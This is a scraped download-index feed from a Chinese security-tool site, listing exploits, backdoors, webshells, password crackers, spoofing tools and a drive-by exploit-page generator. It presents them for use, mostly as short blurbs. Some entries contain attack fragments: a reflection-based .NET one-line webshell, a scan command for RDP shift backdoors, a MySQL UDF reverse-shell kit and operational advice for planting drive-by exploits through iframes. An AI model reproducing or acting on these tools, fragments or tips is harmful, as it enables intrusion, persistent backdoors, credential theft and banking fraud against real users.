http://www.vfocus.net/soft/index.html 安全工具 zh-cn CopyRight&nbsp;&copy;&nbsp;2002-2008 <a href="/" target=_blank title=":::VITTERSAFE危特网安:::">VFocuS.Net</a> All Rights Reserved webmaster@mail.securitycn.net http://www.vfocus.net/soft/20081115/4125.html * SMBRELAY 3 - NTLM replay attack (version 1.0 ) public version * (c) 2008 Andres Tarasco Acua ( atarasco _at_ gmail.com ) * URL: http://tarasco.org/Web/tools.html 2008-11-15 攻击程序 atarasco http://tarasco.org/Web/tools.html http://www.vfocus.net/soft/20081113/4120.html [WGXE]Word Gmail Xss Exp Author: www.80vul.com 说明 Exploit利用的了2个bug: [1]Microsoft word javascript execution : http://marc.info/?l=bugtraqm=121121432823704w=2 [2]浅析浏览器的跨域安全问题: http://www.icylife.net/pstzine/0x02/html/PSTZine_0x02_0x0 2008-11-13 攻击程序 80vul www.80vul.com http://www.vfocus.net/soft/20081027/4052.html MS08-0xx Windows Kernel Ancillary Function Driver Local Privilege Escalation Vu lnerability Exploit Create by SoBeIt. exploit见：《 MS08066本地权限提升漏洞exploit 》 2008-10-27 攻击程序 SoBeIt http://www.whitecell.org/ http://www.vfocus.net/soft/20081027/4044.html MS Windows Server Service Code Execution Exploit (MS08-067) (cn univ.) MS08-067 Exploit for CN 2k/xp/2003 bypass version MS08-067第一个可用代码公布 shellcode是metasploit生成的。 通用的exploit MS08-067 Exploit for CN by EMM@ph4nt0m.org MS08-067.exe S 2008-10-27 攻击程序 EMM EMM@ph4nt0m.org http://www.vfocus.net/soft/20081024/4042.html MS Windows Server Service Code Execution PoC (MS08-067) 2008-10-24 攻击程序 lawler www.vfcocus.net http://www.vfocus.net/soft/20081022/4024.html Mysql BackDoor是一款针对PHP+Mysql服务器开发的后门,后门安装后为Mysql增加一个可以执行系统命令的state函数,并且随 Mysql进程启动一个基于Dll的嗅探型后门,从而巧妙地实现了无端口,无进程,无服务的穿墙木马.程序在WINXP、 WIN2003+MYSQL5.0.X下通过. [安装] 将Mysql. 2008-10-22 后门程序 linx http://hi.baidu.com/linx2008 http://www.vfocus.net/soft/20081020/3921.html DB_OWNER許可權備份hta到啟動項提權的小工具。 2008-10-20 攻击程序 vfocus www.vfcocus.net http://www.vfocus.net/soft/20081020/3920.html 软件说明： 程序包 包括一个基于反射的.net 一句话木马，可以插入代码的模式运行。 %try{ System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies[psw].Value))).CreateInstance(c, true, System.Reflection.BindingFlags.Default, null, new o 2008-10-20 后门程序 cncert http://www.cncert.net http://www.vfocus.net/soft/20081009/3912.html (From http://nomoreroot.blogspot.com/2008/10/windows-2003-poc-exploit-for-token.html) It has been a long time since Token Kidnapping presentation (http://www.argeniss.com/research/TokenKidnapping.pdf) was published so I decided to release a PoC explo 2008-10-09 攻击程序 Cerrudo http://nomoreroot.blogspot.com/2008/10/windows-200 http://www.vfocus.net/soft/20081003/3882.html EMR_COLORMATCHTOTARGETW stack buffer overflow exploit By Ac!dDrop This is one of the 2 Vulnerabilities of MS08-021 Tested on Windows xp professional SP1 GDi32.dll 5.1.2600.1106 kernel32.dll 5.1.2600.1106 ws2_32.dll 5.1.2600.0 calc.zip--- executes cal 2008-10-03 攻击程序 Ac!dDrop http://milw0rm.com/ http://www.vfocus.net/soft/20080916/3825.html No Arp欺骗的会话劫持工具，支持上行，下行双向劫持。 发布时间： 2008年9月12日 更新： 整合Httphijack 的功能并大大提高效率； 增加上行劫持方式 即可用于服务器网络； 更新引擎库； 截图： 使用说明： 1.设置网卡，网关IP，本地IP 2.下行劫持： 例如本机为192.168.3. 2008-09-16 攻击程序 cncert www.cncert.net http://www.vfocus.net/soft/20080916/3824.html from: http://hi.baidu.com/cloie/blog/item/6753735065864a64853524d3.html By:cloie 首先3389的SHIFT后门极少 其次大部分SHIFT后门都加密 所以手工一个一个尝试是挺傻的，写成自动扫描的话，还能让人忍受 smclient -f:shift_backdoor.txt -s:125.91.15.254 -l:1 -v -d 2008-09-16 扫描工具 cloie http://hi.baidu.com/cloie http://www.vfocus.net/soft/20080814/3743.html Successfully poisoned the latest BIND with fully randomized ports! Exploit required to send more than 130 thousand of requests for the fake records like 131737-4795-15081.blah.com to be able to match port and ID and insert poisoned entry for the pois 2008-08-14 攻击程序 Zbr www.vfcocus.net http://www.vfocus.net/soft/20080521/3563.html 集跨库，暴库，扫描注入点、后台、数据库，IIS漏洞及日志分析的安全检测工具 2008-05-21 扫描工具 54nb http://www.54nb.com/ http://www.vfocus.net/soft/20080516/3547.html -------------------------- NtGod Private Powered By golds7n[LAG] -------------------------- Usage: NtGodMode.exe ON|OFF NTGod NT上帝模式,打开上帝模式可以用任意密码登录任意windows系统帐号,从而达到不增加帐号、不破坏被入侵主机系统的情况下,登录系统帐号。 2008-05-16 后门程序 goldsun golds7n[LAG] http://www.vfocus.net/soft/20080516/3546.html tara 是tiger的更新版本，是linux下的一个基础安全评估工具。 在以下平台测试通过。 Red Hat Version 5.x, 6.x, 7x; SGI IRIX 5.3, 6.x, and SunOS 5.x. Mac OSX interface. 2008-05-16 扫描工具 sap http://www-arc.com/tara/ http://www.vfocus.net/soft/20080516/3545.html spcrk(Services Password Crack)用于在Linux系统下探测网络服务登陆口令的工具，现支持telnet ftp pop3 mssql mysql postgres sybase vnc socks5 snmp cvs smtp-auth; 将来考虑加入更多的支持,如: imap smb smbnt http cisco ldap nntp rexec rlogin rsh icq pcnfs sapr 2008-05-16 口令破解 yearnx https://sourceforge.net/projects/spcrk http://www.vfocus.net/soft/20080516/3544.html Rootkit Unhooker是一款较新的RK检测工具,来自俄罗斯.其检测手段比IceSword可靠得多(虽然功能还不如IceSword齐全).有服务描述表钩子检测和恢复,强大的进程检测,强大的驱动检测,隐藏进程杀除,API钩子检测,驱动转储,生成报告等等功能. 1.软件界面为英文(低版本有中文文件, 2008-05-16 单机安全 rkunhooker www.rkunhooker1.narod.ru http://www.vfocus.net/soft/20080203/3359.html AspxSpy 1.0 Cody By Bin[20nt] download : http://www.rootkit.net.cn/code/aspxspy.rar Readme: 1.开发环境VS2005 + C#，兼容FrameWork1.1/2.0，基本实现代码分离。 2.密码为32位MD5加密(小写) 默认为 admin. 3.采用POST方式提交数据，增强了隐蔽性。 4.添加了IIS探 2008-02-03 后门程序 Bin www.vfocus.net http://www.vfocus.net/soft/20080126/3343.html 七剑 deZender 绿色版 1.1 七剑 deZender 绿色版是用来解密Zend加密过的PHP文件 1.支持批量解密 2.集成到右键解密 3.支持部分自定义参数 内核来自 http://dll.newz.cc/dezend/ 集成右键的功能写的很郁闷,因为之前没有写过这样的东西,而且在写的过程发现一个奇怪的问题, 2008-01-26 加密解密 七剑 www.vfocus.net http://www.vfocus.net/soft/20080122/3325.html Windows RSH daemon = 1.8 Remote Buffer Overflow Exploit * Windows RSH daemon =1.8 remote exploit * ======================================= * rshd is a multithreaded daemon service that listens for connections on port 514 * (tcp port for the shell/cm 2008-01-22 攻击程序 prdelka www.vfocus.net http://www.vfocus.net/soft/20080115/3314.html Quicktime Player = 7.3.1.70 HTTP error message buffer-overflow 0.1 by Luigi Auriemma e-mail: aluigi@autistici.org web: aluigi.org Usage: quicktimebof.exe offset retaddr shellcode - offset is the offset in the error messsage (so HTTP/1.1 404 excluded 2008-01-15 攻击程序 Luigi http://aluigi.org http://www.vfocus.net/soft/20071126/3234.html 迅雷官方最新版本迅雷(Thunder5.7.4.401)依然受此漏洞影响 挂马相当好用，只是如果用iframe，宽高不能为0 （pplayer.dll 组件版本号：1.2.3.49，CLSID:F3E70CEA-956E-49CC-B444-73AFE593AD7F） 2007-11-26 攻击程序 baicker baicker's Blog http://www.vfocus.net/soft/20071126/3233.html 好像10.5以下版本都中，这个似乎只能溢出一次，第一次溢出成功后，第二次开始会有realplay修复数据库的提示，点修复就中，取消不中 上次测试使用的Windows 按钮突破专家 4.5K 溢出没问题，但是iecv.exe那个87K 溢出的时候老是看不到界面，其实已经执行（进程中可以看到 2007-11-26 攻击程序 baicker baicker's Blog http://www.vfocus.net/soft/20070713/3020.html Symantec AntiVirus symtdi.sys Local Privilege Escalation Author: Zohiartze Herce Site: http://48bits.com 2007-07-13 攻击程序 Zohiartze http://48bits.com http://www.vfocus.net/soft/20070521/2912.html LSASecretsView V1.10┊可解密出包括管理员密码、拨号密码等|需管理员权限 无需攻击 LSASS 进程即可解密出包括管理员密码、拨号密码、ASPNet密码等在内的系统重要密码，由于像前面说的此软件无需对 LSASS 进行破解，所以不像其它系统密码破解工具那样工作时可能造成死机 2007-05-21 口令破解 SZSAGA http://www.nirsoft.net/ http://www.vfocus.net/soft/20070521/2911.html usage: wscan -Vb -h host -f hostfile -p pathfile -t maxthread -e ext -c flag -s suffix -F [FIXED]@@@@ -S startblock -r statuscode -l logfile from-len to-len [charset] -bis brute-forcing used custom charset -his host to scan -fis path file -tis max th 2007-05-21 扫描工具 cooldiyer cooldiyer http://www.vfocus.net/soft/20070521/2910.html 传统的漏洞扫描器（比如：流光、x-scan、IPtools等）虽然能够通过扫描发现这些漏洞， 但仅有简单的文字描述却很难使普通用户接受其计算机存在严重漏洞的事实。与此同时，部分 用户对这些机器内存在的漏洞不采取任何防护措施，使机器处理完全不设防的状态，一旦这台 计算 2007-05-21 攻击程序 nelinzi 新浪博客 http://www.vfocus.net/soft/20070416/2862.html Microsoft DNS Server Remote Code execution Exploit and analysis Advisory: http://www.microsoft.com/technet/security/advisory/935964.mspx This remote exploit works against port 445 (also Microsoft RPC api used) Author: * Mario Ballano ( mballano~gmail 2007-04-16 攻击程序 Mario mballano~gmail.com http://www.vfocus.net/soft/20070409/2845.html ----------------------------------------------------------------- | PHPWind 5.x Exploits | | | | Powered by HamFast V1.12 20070101 | | | \---------------------------------------------------------------/ Useage: [1] pw5expcmd.exe url // Just test th 2007-04-09 攻击程序 HamFast www.vfocus.net http://www.vfocus.net/soft/20070409/2844.html ----------------------------------------------------------------- | PHPWind 5.x Exploits | | | | Powered by HamFast V1.12 20070101 | | | \---------------------------------------------------------------/ ATTANTION: Only do this bug test on your boar 2007-04-09 攻击程序 HamFast :::VITTERSAFE危特网安::: http://www.vfocus.net/soft/20070405/2836.html TrueCrypt = 4.3 Local Privilege Escalation Exploit (CVE-2007-1738) # $Id: raptor_truecrypt,v 1.1.1.1 2007/04/04 11:31:56 raptor Exp $ # # raptor_truecrypt - setuid truecrypt privilege escalation # Copyright (c) 2007 Marco Ivaldi raptor@0xdeadbeef.in 2007-04-05 攻击程序 Marco raptor@0xdeadbeef.info http://www.vfocus.net/soft/20070404/2831.html Info: .ANI (RIFF Cursors) 2007 universal exploit generator Tested on MS Internet Explorer 6.x-7.x, Windows XP SP2, Windows Vista Author: Yag Kohha skyhole [at] gmail.com 10x`n`Gr33tz 2: Jamikazu, Skylined (pretty good t-short on BH07 Europe - L00k li 2007-04-04 攻击程序 Yag Kohha skyhole [at] gmail.com http://www.vfocus.net/soft/20070402/2820.html Ani 0day网马生成器 2007-04-02 攻击程序 vitter www.vfocus.net http://www.vfocus.net/soft/20070327/2812.html 功能简介: 1.该程序主要针对非SA用户. 2.得到SQL账号密码,通过调用XP_dirtree扩展,对SQL数据库所在的服务器进行列目录操作. 3.完全切换到pubs数据库操作,即使该账号没有建表的权限! 4.增加了自动备份SHELL的功能. 5.感谢Venomancer 提供的精神上的支持! 2007-03-27 后门程序 54bin www.rootkit.net.cn http://www.vfocus.net/soft/20070309/2745.html 从钓鱼与BHO角度看在线支付安全问题 的程序代码。BHO劫持工商银行中文输入与其在线网银支付网页。 2007-03-09 攻击程序 linkboy xfocus.net http://www.vfocus.net/soft/20070307/2731.html /*****************************************************************************\ * Microsoft Windows .doc File Malformed Pointers DoS * * * * * * * * Just move your mouse on the file and explorer crashes. If it does not try * * to look at file proper 2007-03-07 攻击程序 Marsu MarsupilamiPowa@hotmail.fr http://www.vfocus.net/soft/20070228/2703.html 冰盾DDOS防火墙v8.1免注册专业破解版 2007-02-28 单机安全 vitter vfocus.net http://www.vfocus.net/soft/20070228/2702.html 将asp木马插入gif中调用工具 2007-02-28 后门程序 vitter :::VITTERSAFE危特网安::: http://www.vfocus.net/soft/20070228/2701.html 特别感谢所有报告Bug和提出建议的朋友,正在使用BlackRose反黑 工具箱的朋友,以及一直默默的支持和鼓励我继续开发的家人,朋友, 同学和热心的网友,无论是言语上,行动上,都让我感觉到由衷的激励! 希望关心BlackRose反黑工具箱的朋友给予更多的关怀.谢谢! ================ 2007-02-28 单机安全 董哲 BlackRose Software Studio http://www.vfocus.net/soft/20070227/2699.html Alipay ActiveX Remote Code Execute Exploit 2007-02-27 攻击程序 cocoruder http://ruder.cdut.net http://www.vfocus.net/soft/20070227/2698.html tracert的图形版，关键他可以把ip转换成地址。 很不错 里面的ip库可以自升级 版本是 2007-01-30 2007-02-27 网络工具 allyesno http://www.xsec.org/ http://www.vfocus.net/soft/20070227/2697.html tracert网络结构侦查,visualrout2007,图形界面更加漂亮，功能更强大 2007-02-27 扫描工具 Visualware http://www.visualroute.com http://www.vfocus.net/soft/20070207/2649.html -- raptor_winudf.sql - A MySQL UDF backdoor kit for Windows -- Copyright (c) 2007 Marco Ivaldi raptor@0xdeadbeef.info -- -- This is a MySQL backdoor kit for Windows based on the UDFs (User Defined -- Functions) mechanism. Use it to spawn a reverse sh 2007-02-07 后门程序 Marco www.0xdeadbeef.info http://www.vfocus.net/soft/20070205/2641.html syscheck2 反黑辅助说明: 跟着syscheck测试使用了几个月，伴随着作者和一群热心网友的共同努力，感觉目前的版本已经做的比较完善了。时机成熟，放出来供各位使用吧：） 软件名称：Syscheck作者：wangsea软件BUG报告： wangsea6071@sina.com.cn 软件适用于 Win2000 、 Wi 2007-02-05 单机安全 wangsea :::VITTERSAFE危特网安::: http://www.vfocus.net/soft/20070202/2633.html 项目名称：智慧小子smartkid 项目作者：菠菜dream2fly 联系方式：songbohr@gmail.com 项目类别：防火墙压力攻击测试工具 工作环境：win32(暂不支持XP SP2) 开源地址： http://www.dream2fly.net/blog/index.php 项目地址： http://www.dream2fly.net/projects.php 网站 2007-02-02 扫描工具 smartkid http://www.dream2fly.net http://www.vfocus.net/soft/20070202/2632.html scripts 2 exe是一个工具包，它包含了perl2exe,py2exe,php2exe，以及一个php2exe图形界面程序。 它们的功能分别是将perl,python,php写的脚本转化为windows平台可以执行的exe. 其中perl2exe是共享软件，已提供注册机。 2007-02-02 嗅探器 Ecore http://www.xfocus.net http://www.vfocus.net/soft/20070202/2631.html Include source code and binary release ARPSpoof Ver 3.1b by CoolDiyer Usage: ArpSpoof IP1 IP2 PORT AdpNum Mode /[r|s] File ArpSpoof /s IP Mask ArpSpoof /l Mode Options: 0IP1 -- IP2 1IP1 - IP2 Examples: ArpSpoof 192.168.0.1 192.168.0.8 80 2 1 /r job.t 2007-02-02 嗅探器 CoolDiyer http://www.xfocus.net http://www.vfocus.net/soft/20070201/2625.html 2006-02-18 其它工具 alert7 http://www.xfocus.net http://www.vfocus.net/soft/20070201/2624.html 2006-01-15 其它工具 T_Torchidy http://www.cnbct.org